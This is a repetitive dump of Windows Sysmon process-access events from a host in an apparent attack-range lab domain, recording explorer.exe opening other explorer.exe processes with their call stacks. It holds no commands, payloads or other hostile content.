16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241534Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241533Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241532Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241531Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241530Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241529Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241528Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241527Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241526Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241525Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241524Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241523Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241522Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241521Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241520Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241519Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241518Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241517Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241516Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241515Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241514Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241513Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241512Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241511Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241510Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241509Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241508Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241507Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 